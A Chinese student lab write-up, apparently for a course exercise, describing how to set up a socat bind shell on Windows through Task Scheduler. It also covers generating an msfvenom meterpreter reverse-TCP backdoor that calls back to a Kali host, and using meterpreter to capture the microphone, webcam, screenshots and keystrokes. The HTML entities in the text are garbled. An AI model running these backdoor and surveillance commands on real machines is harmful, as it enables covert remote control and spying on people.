实践过程

在Windows系统下&＃xff0c;打开控制面板->管理工具->任务计划程序&＃xff0c;创建任务&＃xff0c;填写任务名称后&＃xff0c;新建一个触发器&＃xff1a;

在操作->程序或脚本中选择你的socat.exe文件的路径&＃xff0c;在添加参数一栏填写tcp-listen:5307 exec:cmd.exe,pty,stderr&＃xff0c;这个命令的作用是把cmd.exe绑定到端口5307&＃xff0c;同时把cmd.exe的stderr重定向到stdout上&＃xff1a;

创建完成之后&＃xff0c;注销用户&＃xff0c;并再次登录

此时&＃xff0c;在Kali环境下输入指令socat - tcp:192.168.79.130:5307&＃xff0c;这里的第一个参数-代表标准的输入输出&＃xff0c;第二个流连接到Windows主机的5307端口&＃xff0c;此时可以发现已经成功获得了一个cmd shell&＃xff1a;

使用MSF meterpreter生成可执行文件&＃xff0c;利用ncat或socat传送到主机并运行获取主机Shell

输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST&＃61;192.168.79.128 LPORT&＃61;5307 -f exe > 20145307_backdoor.exe生成后门程序&＃xff0c;通过nc指令将生成的后门程序传送到Windows主机上

在Kali上使用msfconsole指令进入msf控制台&＃xff0c;使用监听模块&＃xff0c;设置payload&＃xff0c;设置反弹回连的IP和端口&＃xff1a;

设置完成后&＃xff0c;执行监听&＃xff1a;

打开Windows上的后门程序此时Kali上已经获得了Windows主机的连接&＃xff0c;并且得到了远程控制的shell&＃xff1a;

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容&＃xff0c;并尝试提权&＃xff0c;使用record_mic指令可以截获一段音频&＃xff0c;使用webcam_snap指令可以使用摄像头进行拍照&＃xff0c;使用webcam stream指令可以使用摄像头进行录像&＃xff0c;使用screenshot指令可以进行截屏&＃xff0c;使用keyscan_start指令开始记录下击键的过程&＃xff0c;使用keyscan_dump指令读取击键的记录

对对对&＃xff0c;但是我用的win7虚拟机&＃xff0c;没摄像头驱动&＃xff0c;没麦克风驱动&＃xff0c;但是屏幕截图还是可以做的吗&＃xff01;截个图表示我这个鬼东西做出来了 是能用的